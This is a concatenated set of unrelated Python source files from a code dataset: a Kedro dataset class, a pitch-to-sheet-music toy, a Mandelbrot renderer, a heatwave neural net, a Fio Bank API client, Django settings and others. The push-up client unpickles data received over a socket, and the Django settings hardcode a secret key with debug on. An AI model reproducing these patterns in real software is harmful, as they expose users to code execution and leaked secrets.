sorted(data.items()):\n kwargs = deepcopy(self._dataset_config)\n partition = self._partition_to_path(partition_id)\n # join the protocol back since tools like PySpark may rely on it\n kwargs[self._filepath_arg] = self._join_protocol(partition)\n dataset = self._dataset_type(**kwargs) # type: ignore\n dataset.save(partition_data)\n self.invalidate_cache()\n\n def _describe(self) -> Dict[str, Any]:\n clean_dataset_config = (\n {k: v for k, v in self._dataset_config.items() if k != CREDENTIALS_KEY}\n if isinstance(self._dataset_config, dict)\n else self._dataset_config\n )\n return dict(\n path=self._path,\n dataset_type=self._dataset_type.__name__,\n dataset_config=clean_dataset_config,\n )\n\n def invalidate_cache(self):\n \"\"\"Invalidate `_list_partitions` method and underlying filesystem caches.\"\"\"\n self._list_partitions.cache_clear()\n self._filesystem.invalidate_cache(self._path)\n\n def _exists(self) -> bool:\n return bool(self._list_partitions())\n\n def _release(self) -> None:\n self.invalidate_cache()\n\n\ndef _split_credentials(\n credentials: Union[Dict[str, Any], None]\n) -> Tuple[Dict[str, Any], Any]:\n credentials = deepcopy(credentials) or {}\n dataset_credentials = credentials.pop(\n DATASET_CREDENTIALS_KEY, deepcopy(credentials)\n )\n return credentials, dataset_credentials\n","sub_path":"kedro/io/partitioned_data_set.py","file_name":"partitioned_data_set.py","file_ext":"py","file_size_in_byte":12934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"62589768","text":"import pygame\nfrom pygame.locals import *\nimport sys\nimport pyaudio\nimport aubio\nimport numpy as np\n\npygame.init()\nwindow = pygame.display.set_mode((1147, 630))\npygame.display.set_caption('Rejestrator nut')\nbackground44cm = pygame.image.load('media/staff/staff44cm.png')\nnote = pygame.image.load('media/notes/quarter.png')\nnoteH = pygame.image.load('media/notes/quarterH.png')\nnoteC = pygame.image.load('media/notes/quarterC.png')\nsharp = pygame.image.load('media/notes/quarterC#.png')\nbarline = pygame.image.load('media/staff/barline1.png')\nscreen = pygame.display.get_surface()\n\n# if metrum -- 4 4:\nscreen.blit(background44cm, (0,0))\npygame.display.flip()\n\np = pyaudio.PyAudio()\nstream = p.open(format=pyaudio.paFloat32,\n channels=1,\n rate=44100,\n input=True,\n frames_per_buffer=1024)\n\npDetection = aubio.pitch(\"default\", 2048, 2048 // 2, 44100)\npDetection.set_unit(\"Hz\")\npDetection.set_silence(-40)\n\ndef input(events):\n for event in events:\n if event.type == QUIT:\n sys.exit(0)\n \nfreq = 0\nbar = 0\nINTERVAL = 30\nA = 9\n\nx = 80\nh = 131\ny1 = 36\ny2 = 32\ny3 = 25\ny4 = 19\ny5 = 13\ny6 = 7\ny7 = 0\ny8 = -7\n\n\nwhile True:\n input(pygame.event.get())\n data = stream.read(1024)\n samples = np.fromstring(data, dtype=aubio.float_type)\n pitch = pDetection(samples)[0]\n\n if 520 <= pitch <= 540:\n freq += 1\n if freq == A:\n screen.blit(noteC, (x, y1))\n if screen.blit(noteC, (x, y1)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 550 <= pitch <= 570:\n freq += 1\n if freq == A:\n screen.blit(sharp, (x, y1))\n if screen.blit(sharp, (x, y1)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 580 <= pitch <= 600:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y2))\n if screen.blit(note, (x, y2)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 640 <= pitch <= 660:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y3))\n if screen.blit(note, (x, y3)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 690 <= pitch <= 710:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y4))\n if screen.blit(note, (x, y4)):\n bar += 1\n pygame.display.flip()\n freq-= A\n x += INTERVAL\n elif 765 <= pitch <= 785:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y5))\n if screen.blit(note, (x, y5)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 855 <= pitch <= 875:\n freq += 1\n if freq== A:\n screen.blit(note, (x, y6))\n if screen.blit(note, (x, y6)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 960 <= pitch <= 970:\n freq += 1\n if freq == A:\n screen.blit(noteH, (x, y7))\n if screen.blit(noteH, (x, y7)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 1015 <= pitch <= 1035:\n freq += 1\n if freq == A:\n screen.blit(noteH, (x, y8))\n if screen.blit(noteH, (x, y8)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n if bar == 4:\n x += INTERVAL\n screen.blit(barline, (x, y3 - 3))\n x += INTERVAL\n bar -= 4\n\n if x == 1160:\n x = 80\n y1 += h\n y2 += h\n y3 += h\n y4 += h\n y5 += h\n y6 += h\n y7 += h\n y8 += h\n","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"591485729","text":"import cv2\nimport numpy as np\nimport socket\nimport sys\nimport pickle\nimport struct\n\n\nprint('pose')\nA = 0\nB = 0\nC = 0\n\nstepA = False\nstepB = False\ncount = 0\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nbottomLeftCornerOfText = (50, 400)\ntopLeft = (150, 400)\n\nfontScale = 3\nfontColor = (255, 0, 0)\nlineType = 2\n\n\ncap=cv2.VideoCapture(0)\nclientsocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nclientsocket.connect(('54.180.176.99',8089))\n#cap = cv2.VideoCapture('pushUp.mp4')\nwhile True:\n ret, frame=cap.read()\n # Serialize frame\n #frame = cv2.transpose(frame)\n #frame = cv2.flip(frame,flipCode=1)\n data = pickle.dumps(frame)\n # Send message length first\n message_size = struct.pack(\"=L\", len(data))\n\n # Then data\n clientsocket.sendall(message_size + data)\n\n pose = clientsocket.recv(4096)\n pose = pickle.loads(pose)\n\n\n\n pose.draw(frame)\n cv2.imshow('test', frame)\n if cv2.waitKey(1) == ord('q'):\n break\n\n\n\n A = np.array([pose.keypoints[2][0],pose.keypoints[2][1]])\n if B is 0:\n B = np.array([pose.keypoints[10][0],pose.keypoints[10][1]])\n if C is 0:\n C = np.array([pose.keypoints[4][0],pose.keypoints[4][1]])\n\n BA = A - B\n BC = C - B\n\n cosine_angle = np.dot(BA, BC) / (np.linalg.norm(BA) * np.linalg.norm(BC))\n angle = np.arccos(cosine_angle)\n angle = np.degrees(angle)\n print(angle)\n\n if angle > 25 :\n stepA = True\n if angle < 15 :\n stepB = True\n\n if stepA and stepB is True :\n if angle > 25:\n stepA = False\n stepB = False\n count += 1\n\n cv2.putText(frame,\"good\",\n topLeft,\n font,\n fontScale,\n fontColor,\n lineType)\n if stepA is True and stepB is False :\n if angle > 25:\n stepA = False\n stepB = False\n cv2.putText(frame, \"count\" + str(count),\n bottomLeftCornerOfText,\n font,\n fontScale,\n fontColor,\n lineType)\n #cv2.imshow(\"img\", frame)\n\n print(count)\n\n","sub_path":"lightweight-human-pose-estimation.pytorch-master/pushUpClient.py","file_name":"pushUpClient.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"166916108","text":"import numpy as np\nfrom PIL import Image\nimport cmath\nimport time \n\n\nheight = 1000\nwidth = 1000\n\ndata = np.zeros( (height, width,3), dtype=np.uint8 )\n\nre_lb = -2\nre_ub = 2\nim_lb = -2\nim_ub = 2\n\nre_interval = (re_ub - re_lb) / width\nim_interval = (im_ub - im_lb) / height\n\n\ndef test_converge(re, im):\n z = complex(re, im)\n seed = complex(0,0)\n iterations = 0\n \n while seed.real**2+seed.imag**2 < 10 and iterations < 100:\n new_z = seed*seed + z\n seed = new_z\n iterations += 1\n\n if iterations == 100:\n return 0\n else:\n return (iterations * 3.6)\n\nstart = time.time()\n\nfor i in range(width):\n re_val = re_lb + i * re_interval\n for j in range(height):\n im_val = im_lb + j * im_interval\n\n colour = test_converge(re_val, im_val)\n if colour == 0:\n data[j, i] = (0,0,0)\n else:\n data[j,i] = (215, 254, colour) # makes a nice fade out as divergence speed increases - as you go away from the fractal\n\n\n\n\nmandelbrot_set = Image.fromarray(data, mode = \"HSV\")\n\nmandelbrot_set.show()\nend = time.time()\nprint(end - start)\n\n\n\n\n\n\n","sub_path":"mandelbrot.py","file_name":"mandelbrot.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"647005210","text":"import os\nimport pandas as pd\npwd=r'C:\\Users\\jnjga\\Desktop\\university\\服创\\ts\\Data_FCDS_hashed'\nsv_path=os.path.join(pwd,'all.csv')\nif os.path.exists(sv_path):\n os.remove(sv_path)\nfiles=os.listdir(pwd)\nfiles=files[:8]\ndf = pd.read_csv(pwd +'\\\\'+ files[0]) \ndf.to_csv(sv_path,encoding=\"utf_8_sig\",index=False)\nall_df=pd.read_csv(sv_path)\n\n#循环遍历列表中各个CSV文件名,并追加到合并后的文件\nfor i in range(1,len(files)):\n print(files[i])\n new_df = pd.read_csv(pwd + '\\\\'+ files[i], encoding='ISO-8859-1')\n all_df = pd.merge(all_df,new_df,how = 'outer',on='entname')\n\nos.remove(sv_path)\nall_df.to_csv(sv_path,encoding=\"utf_8_sig\",index=False)\n","sub_path":"nonsense/try_1/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"387361355","text":"def VHF(close,period=28):\n HCP=[]\n LCP=[]\n sums=[close[0]]\n denum=[]\n for i in range(period-1):\n HCP.append(max(close[:i+1]))\n LCP.append(min(close[:i+1]))\n sums.append(abs(close[i]-close[i-1]))\n denum.append(sum(sums[:i+1]))\n for i in range(period-1,len(close)):\n HCP.append(max(close[i-period+1:i+1]))\n LCP.append(min(close[i-period+1:i+1]))\n sums.append(abs(close[i]-close[i-1]))\n denum.append(sum(sums[i-period+1:i+1]))\n VHF=[(i-j)/k for (i,j,k) in zip(HCP,LCP,denum)]\n return VHF\n","sub_path":"Day043/VHF.py","file_name":"VHF.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"362741509","text":"import pytest\n\nfrom ...core import ProxyTypeError\nfrom ...primitives import Int, Str\nfrom ...geospatial import ImageCollection, Image, FeatureCollection, GeometryCollection\n\nfrom .. import Tuple, List, zip as wf_zip\n\n\nexamples = [\n List[Int]([1, 2, 3]),\n List[Str]([\"a\", \"b\", \"c\"]),\n List[Tuple[Int, Str]]([(1, \"foo\"), (3, \"bar\")]),\n ImageCollection.from_id(\"foo\"),\n Image.from_id(\"foo\"),\n FeatureCollection.from_vector_id(\"bar\"),\n GeometryCollection.from_geojson({\"type\": \"GeometryCollection\", \"geometries\": []}),\n]\n\n\n@pytest.mark.parametrize(\"args\", [examples, ()] + [(ex,) for ex in examples])\ndef test_zip(args):\n zipped = wf_zip(*args)\n assert isinstance(\n zipped,\n List[Tuple[tuple(getattr(arg, \"_element_type\", type(arg)) for arg in args)]],\n )\n\n\ndef test_zip_str():\n zipped = wf_zip(Str(\"abcd\"), List[Int]([1, 2, 3]))\n assert isinstance(zipped, List[Tuple[Str, Int]])\n\n\n@pytest.mark.parametrize(\n \"seqs\",\n [\n [List[Int]([1, 2, 3]), [1, 2, 3]],\n [List[Int]([1, 2, 3]), Tuple[Int, Int, Int]([1, 2, 3])],\n [List[Int]([1, 2, 3]), \"asdf\"],\n ],\n)\ndef test_zip_wrong_args(seqs):\n with pytest.raises(\n ProxyTypeError, match=\"All arguments to 'zip' must be Proxytype sequences\"\n ):\n wf_zip(*seqs)\n","sub_path":"descarteslabs/workflows/types/containers/tests/test_zip.py","file_name":"test_zip.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"970694","text":"import pickle\n\nimport requests\n\n\nurl = 'http://avilpage.com'\n\n# build query url\npayload = {'start': 10, 'end': 20}\nresponse = requests.get(url, params=payload)\nprint(response.url)\n\nresp = requests.post(url, headers={'Authorization': 'Basic foo'})\ndata = resp.json()\n\nr = requests.post('http://httpbin.org/post', data = {'key':'value'})\n\n\nwith open('d.pkl', 'wb') as fh:\n pickle.dump(data, fh)\n\n\n# save image\nimport requests\nimport shutil\n\nr = requests.get(settings.STATICMAP_URL.format(**data), stream=True)\nif r.status_code == 200:\n with open(path, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n","sub_path":"python/requests_exp.py","file_name":"requests_exp.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"534745693","text":"# Read Data\ndata_path = 'test_load_data/MERRA2_400.statD_2d_slv_Nx.'\nselected_date = '20191003'\ntt_path = data_path + selected_date + '.nc4'\nlongitude = int(120.982024)\nlatitude = int(23.973875) \n\n# Import package\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\n# For data preprocess\nimport numpy as np\nfrom netCDF4 import Dataset as nDS\nimport csv\nimport os\nfrom datetime import date\n\nmyseed = 42069 # set a random seed for reproducibility\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(myseed)\ntorch.manual_seed(myseed)\nif torch.cuda.is_available():\n torch.cuda.manual_seed_all(myseed)\n\n# Utilities\ndef get_device():\n ''' Get device (if GPU is available, use GPU) '''\n return 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef is_leap_year(year):\n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n return True \n else:\n return False\n else:\n return True\n else:\n return False\n\n# Dataset\nclass heatwaveDataset(Dataset):\n def __init__(self, path, mode='test', target_only=False):\n self.mode = mode\n\n # Init data\n data = torch.zeros([1, 361, 576, 1, features_num], dtype = torch.float64)\n # Recursively read and preprocess daily air temperature data\n year = path[-12: -8]\n month = path[-8: -6]\n day = path[-6: -4]\n if int((year + month + day)) > 20210930:\n year = '2021'\n month = '09'\n day = '30'\n\n year = int(year)\n month = int(month)\n day = int(day)\n\n for i in range(1, 5):\n t_year = year\n t_month = month\n t_day = day\n \n t_day = t_day - i\n if t_day <= 0:\n t_month = 12 if t_month-1 == 0 else t_month-1\n if t_month == 12:\n t_year -= 1\n t_day = 31 + day - i\n elif t_month == 2 and is_leap_year(t_year):\n t_day = 29 + day - i\n elif t_month == 2:\n t_day = 28 + day - i\n elif t_month in [1,3,5,7,8,10]:\n t_day = 31 + day - i\n elif t_month in [4,6,9,11]:\n t_day = 30 + day - i\n\n print([t_year, t_month, t_day])\n nasa_data = nDS(path[:-12] + str(t_year) + str(t_month).rjust(2,'0') + str(t_day).rjust(2,'0') +'.nc4', mode='r')\n \n T2MMAX = torch.tensor(nasa_data.variables['T2MMAX'][:,:,:].astype(float))\n TPRECMAX = torch.tensor(nasa_data.variables['TPRECMAX'][:,:,:].astype(float))\n\n # Extend to five dimensions\n T2MMAX = torch.unsqueeze((T2MMAX), 3)\n TPRECMAX = torch.unsqueeze((TPRECMAX), 3)\n T2MMAX = torch.unsqueeze((T2MMAX), 4)\n TPRECMAX = torch.unsqueeze((TPRECMAX), 4)\n\n # Store all data in fifth dimension\n temp_data = torch.cat((TPRECMAX, T2MMAX), 4)\n data = torch.cat((data, temp_data), 3)\n\n y_axis = 180 - latitude\n x_axis = 288 + longitude\n data = data[0, y_axis, x_axis, 1:, :]\n \n \n # Testing data\n self.data = data\n\n # Normalize features\n self.data[:, :] = \\\n (self.data[:, :] - self.data[:, :].mean(dim=0, keepdim=True)) \\\n / self.data[:, :].std(dim=0, keepdim=True) \n \n self.dim = self.data.shape[1]\n\n print('Finished reading the {} set of heatwave Dataset ({} samples found, each dim = {})'.format(mode, len(self.data), self.dim))\n\n def __getitem__(self, index):\n # Returns one sample at a time\n # For testing (no target)\n return self.data[index]\n\n def __len__(self):\n # Returns the size of the dataset\n return len(self.data)\n\n# Dataloader\ndef prep_dataloader(path, mode, batch_size, n_jobs=0, target_only=False):\n ''' Generates a dataset, then is put into a dataloader. '''\n dataset = heatwaveDataset(path, mode=mode, target_only=target_only) # Construct dataset\n dataloader = DataLoader(\n dataset, batch_size,\n shuffle=(mode == 'train'), drop_last=False,\n num_workers=n_jobs, pin_memory=True) # Construct dataloader\n return dataloader\n\n# Deep Neural Network\nclass NeuralNet(nn.Module):\n ''' A simple fully-connected deep neural network '''\n def __init__(self, input_dim):\n super(NeuralNet, self).__init__()\n\n self.net = nn.Sequential(\n nn.Linear(input_dim, 64).float(),\n nn.ReLU().float(),\n nn.Linear(64, 1).float()\n )\n\n # Mean squared error loss\n self.criterion = nn.MSELoss(reduction='mean')\n\n def forward(self, x):\n ''' Given input of size (batch_size x input_dim), compute output of the network '''\n # TODO: improve model\n return self.net(x.float()).squeeze(1)\n\n def cal_loss(self, pred, target):\n ''' Calculate loss '''\n # TODO: you may implement L1/L2 regularization here\n return self.criterion(pred, target)\n\n# Testing\ndef test(load_set, model, device):\n model.eval() # set model to evalutation mode\n preds = []\n for x in load_set: # iterate through the dataloader\n x = x.to(device) # move data to device (cpu/cuda)\n with torch.no_grad(): # disable gradient calculation\n pred = model(x) # forward pass (compute output)\n preds.append(pred.detach().cpu()) # collect prediction\n preds = torch.cat(preds, dim=0).numpy() # concatenate all predictions and convert to a numpy array\n return preds\n\n# Setup Hyperparameter\ndevice = get_device() # get the current available device ('cpu' or 'cuda')\nos.makedirs('models', exist_ok=True) # The trained model will be saved to ./models/\ntarget_only = False # False: Using Whole features\nfeatures_num = 2\n\nconfig = {\n 'batch_size': 24, # mini-batch size for dataloader\n 'model_path': 'models/model.pth' # your model will be saved here\n}\n\n# Load Data & Model\nload_set = prep_dataloader(tt_path, 'test', config['batch_size'], target_only=target_only)\n\nmodel = NeuralNet(load_set.dataset.dim).to(device)\nckpt = torch.load(config['model_path'], map_location='cpu') # Load your best model\nmodel.load_state_dict(ckpt)\n\n# Testing & Saving Prediction\ndef save_pred(preds, file):\n ''' Save predictions to specified file '''\n print('Saving results to {}'.format(file))\n with open(file, 'w') as fp:\n writer = csv.writer(fp)\n writer.writerow(['id', 'tested_positive'])\n for i, p in enumerate(preds):\n writer.writerow([i, p])\n\npreds = test(load_set, model, device) # predict heatwave cases with your model\nsave_pred(preds, 'pred.csv') # save prediction file to pred.csv","sub_path":"dnn_load_daily_data.py","file_name":"dnn_load_daily_data.py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"407086227","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom datetime import datetime, date\n\nimport requests\nimport xmltodict\n\n\n__all__ = ('FioBank',)\n\n\ndef coerce_date(value):\n if isinstance(value, date):\n return value\n elif isinstance(value, datetime):\n return value.date()\n else:\n return datetime.strptime(value[:10], '%Y-%m-%d').date()\n\n\ndef sanitize_value(value, convert=None):\n if isinstance(value, basestring):\n value = value.strip() or None\n if convert and value:\n return convert(value)\n return value\n\n\nclass FioBank(object):\n\n base_url = 'https://www.fio.cz/ib_api/rest/'\n\n actions = {\n 'periods': 'periods/{token}/{from_date}/{to_date}/transactions.json',\n 'by-id': 'by-id/{token}/{year}/{number}/transactions.json',\n 'last': 'last/{token}/transactions.json',\n 'set-last-id': 'set-last-id/{token}/{from_id}/',\n 'set-last-date': 'set-last-date/{token}/{from_date}/',\n 'import': \"import/\",\n }\n\n transaction_schema = {\n u'ID pohybu': ('transaction_id', str),\n u'Datum': ('date', unicode),\n u'Objem': ('amount', float),\n u'Měna': ('currency', str),\n u'Protiúčet': ('account_number', str),\n u'Název protiúčtu': ('account_name', unicode),\n u'Kód banky': ('bank_code', str),\n u'BIC': ('bic', str),\n u'Název banky': ('bank_name', unicode),\n u'KS': ('constant_symbol', str),\n u'VS': ('variable_symbol', str),\n u'SS': ('specific_symbol', str),\n u'Uživatelská identifikace': ('user_identification', unicode),\n u'Zpráva pro příjemce': ('recipient_message', unicode),\n u'Typ': ('type', unicode),\n u'Provedl': ('executor', unicode),\n u'Upřesnění': ('specification', unicode),\n u'Komentář': ('comment', unicode),\n u'ID pokynu': ('instruction_id', str),\n }\n\n info_schema = {\n u'accountId': ('account_number', str),\n u'bankId': ('bank_code', str),\n u'currency': ('currency', str),\n u'IBAN': ('iban', str),\n u'BIC': ('bic', str),\n u'closingBalance': ('balance', float),\n }\n\n _amount_re = re.compile(r'\\-?[\\d+](\\.\\d+)? [A-Z]{3}')\n\n def __init__(self, token):\n self.token = token\n\n def _request(self, action, **params):\n\n template = self.base_url + self.actions[action]\n\n # Import method - goes via POST.\n if \"import\" == action:\n data = {\"token\": self.token}\n files = {\"file\": params.pop(\"file_content\")}\n data.update(params)\n\n response = requests.post(template, data=data, files=files)\n response.raise_for_status()\n\n return response.text\n\n # Other methods - go via GET.\n else:\n url = template.format(token=self.token, **params)\n response = requests.get(url)\n\n response.raise_for_status()\n\n if response.content:\n return response.json()\n\n def _parse_info(self, data):\n # parse data from API\n info = {}\n for key, value in data['accountStatement']['info'].items():\n if key in self.info_schema:\n field_name, type_ = self.info_schema[key]\n value = sanitize_value(value, type_)\n info[field_name] = value\n\n # make some refinements\n info['account_number_full'] = (info['account_number'] +\n '/' + info['bank_code'])\n\n # return data\n return info\n\n def _parse_transactions(self, data):\n schema = self.transaction_schema\n try:\n entries = data['accountStatement']['transactionList']['transaction']\n except TypeError:\n entries = []\n\n for entry in entries:\n # parse entry from API\n trans = {}\n for column_name, column_data in entry.items():\n if not column_data:\n continue\n field_name, type_ = schema[column_data['name']]\n value = sanitize_value(column_data['value'], type_)\n trans[field_name] = value\n\n # make some refinements\n is_amount = self._amount_re.match\n if 'specification' in trans and is_amount(trans['specification']):\n amount, currency = trans['specification'].split(' ')\n trans['original_amount'] = float(amount)\n trans['original_currency'] = currency\n\n if 'date' in trans:\n trans['date'] = coerce_date(trans['date'])\n\n if 'account_number' in trans and 'bank_code' in trans:\n trans['account_number_full'] = (trans['account_number'] +\n '/' + trans['bank_code'])\n\n # generate transaction data\n yield trans\n\n def _parse_import_response(self, xml):\n\n def parse_order(order):\n \"\"\"\n Parses ID, code and message from order XML.\n \"\"\"\n\n return {\n \"id\": int(order[\"@id\"]),\n \"code\": int(order[\"messages\"][\"message\"][\"@errorCode\"]),\n \"message\": order[\"messages\"][\"message\"][\"#text\"]\n }\n\n data = xmltodict.parse(xml.strip())\n data = data[\"responseImport\"]\n\n # If request was errorfree, parse response.\n if \"0\" == data[\"result\"][\"errorCode\"]:\n return {\n \"status\": True,\n \"instruction_id\": data[\"result\"][\"idInstruction\"],\n \"sum\": data[\"result\"][\"sums\"][\"sum\"][\"sumDebet\"],\n }\n\n else:\n details = []\n\n # If orderDetails has more detail items, iterate thru them.\n if isinstance(data[\"ordersDetails\"][\"detail\"], list):\n for o in data[\"ordersDetails\"][\"detail\"]:\n details.append(parse_order(o))\n\n else:\n details.append(parse_order(data[\"ordersDetails\"][\"detail\"]))\n\n return {\"status\": False, \"details\": details}\n\n def info(self):\n today = date.today()\n data = self._request('periods', from_date=today, to_date=today)\n return self._parse_info(data)\n\n def period(self, from_date, to_date):\n data = self._request('periods',\n from_date=coerce_date(from_date),\n to_date=coerce_date(to_date))\n return self._parse_transactions(data)\n\n def statement(self, year, number):\n data = self._request('by-id', year=year, number=number)\n return self._parse_transactions(data)\n\n def last(self, from_id=None, from_date=None):\n assert not (from_id and from_date), \"Only one constraint is allowed.\"\n\n if from_id:\n self._request('set-last-id', from_id=from_id)\n elif from_date:\n self._request('set-last-date', from_date=coerce_date(from_date))\n\n return self._parse_transactions(self._request('last'))\n\n def send(self, type, language, filename, file_content):\n \"\"\"\n Send = FIO \"import\" method (we cannot use \"import\" because it's Python keyword).\n Sends file of \"sending money requests\" and returns dict.\n\n In case of success:\n {\n \"status\": True,\n \"instruction_id\": 123,\n \"sum\": 1000\n }\n\n In case of failure:\n {\n \"status\": False,\n \"details\": [\n {\n \"id\" \"1\",\n \"code\" \"16\",\n \"message\": \"Lorem ipsum...\",\n },\n {\n \"id\" \"2\",\n \"code\" \"16\",\n \"message\": \"Lorem ipsum...\",\n },\n ...\n ]\n }\n \"\"\"\n\n response = self._request(\"import\", type=type, lng=language, filename=filename, file_content=file_content)\n\n return self._parse_import_response(response)\n","sub_path":"fiobank.py","file_name":"fiobank.py","file_ext":"py","file_size_in_byte":7984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"633952217","text":"\"\"\"\r\nDjango settings for DjangoExtJs project.\r\n\"\"\"\r\n\r\nfrom os import path\r\nPROJECT_ROOT = path.dirname(path.abspath(path.dirname(__file__)))\r\n\r\nDEBUG = True\r\nTEMPLATE_DEBUG = DEBUG\r\n\r\nALLOWED_HOSTS = (\r\n 'localhost',\r\n\t'127.0.0.1',\r\n)\r\n\r\nADMINS = (\r\n # ('Your Name', 'your_email@example.com'),\r\n)\r\n\r\nMANAGERS = ADMINS\r\n\r\nDATABASES = {\r\n 'default': {\r\n 'ENGINE': 'django.db.backends.sqlite3',\r\n 'NAME': path.join(PROJECT_ROOT, 'db.sqlite3'),\r\n 'USER': '',\r\n 'PASSWORD': '',\r\n 'HOST': '',\r\n 'PORT': '',\r\n }\r\n}\r\n\r\n\r\nTIME_ZONE = 'America/Chicago'\r\n\r\nLANGUAGE_CODE = 'en-us'\r\n\r\nSITE_ID = 1\r\n\r\nUSE_I18N = True\r\n\r\nUSE_L10N = True\r\n\r\nUSE_TZ = True\r\n\r\nMEDIA_ROOT = ''\r\n\r\nMEDIA_URL = ''\r\n\r\nSTATIC_ROOT = path.join(PROJECT_ROOT, 'static').replace('\\\\', '/')\r\n\r\nSTATIC_URL = '/static/'\r\n\r\n# Additional locations of static files\r\nSTATICFILES_DIRS = (\r\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\n# List of finder classes that know how to find static files in\r\n# various locations.\r\nSTATICFILES_FINDERS = (\r\n 'django.contrib.staticfiles.finders.FileSystemFinder',\r\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\r\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\r\n)\r\n\r\n# Make this unique, and don't share it with anybody.\r\nSECRET_KEY = 'n(bd1f1c%e8=_xad02x5qtfn%wgwpi492e$8_erx+d)!tpeoim'\r\n\r\n# List of callables that know how to import templates from various sources.\r\nTEMPLATE_LOADERS = (\r\n 'django.template.loaders.filesystem.Loader',\r\n 'django.template.loaders.app_directories.Loader',\r\n# 'django.template.loaders.eggs.Loader',\r\n)\r\n\r\nMIDDLEWARE_CLASSES = (\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.middleware.csrf.CsrfViewMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.contrib.messages.middleware.MessageMiddleware',\r\n # Uncomment the next line for simple clickjacking protection:\r\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\r\n)\r\n\r\nROOT_URLCONF = 'DjangoExtJs.urls'\r\n\r\n# Python dotted path to the WSGI application used by Django's runserver.\r\nWSGI_APPLICATION = 'DjangoExtJs.wsgi.application'\r\n\r\nTEMPLATE_DIRS = (\r\n # Put strings here, like \"/home/html/django_templates\" or\r\n # \"C:/www/django/templates\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\nINSTALLED_APPS = (\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.messages',\r\n 'django.contrib.staticfiles',\r\n 'rest_framework',\r\n 'app'\r\n)\r\n\r\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\r\n","sub_path":"DjangoExtJs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"288651219","text":"# __author__ = 'colleen'\n# !/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nimport requests\n\n# 抓取豆瓣排行榜电影\nurl = 'http://movie.douban.com/chart'\n# page = urllib.request.urlopen(url).read().decode('utf-8')\npage = requests.get(url).text\nsoup = BeautifulSoup(page, 'html.parser')\n\n\n# 新片榜\nNewRanking = soup.find('div', attrs={'class': 'indent'}).find_all('tr', attrs={'class': 'item'})\nprint('豆瓣新片榜---------------------------------------------------------------\\n')\nfor item in NewRanking:\n name = item.find('img').attrs['alt']\n bintros = item.find('p').get_text()\n scores = item.find('span', attrs={'class': 'rating_nums'}).get_text()\n numcomments = item.find('span', attrs={'class': 'pl'}).get_text()\n print(name, bintros, scores, numcomments, '\\n')\n\n\n# 北美票房榜\nNAranking = soup.find('div', id='ranking').find('ul', id='listCont1')\nprint('\\n\\n\\n北美票房榜---------------------------------------------------------------')\nprint(NAranking.find('span', attrs={'class': 'box_chart_num color-gray'}).get_text(), '\\n')\n\ni = 1\nmoney = NAranking.find_all('span')\nfor item in NAranking.find_all('a'):\n print('%2d' % i, item.get_text().strip(), money[i].get_text())\n i += 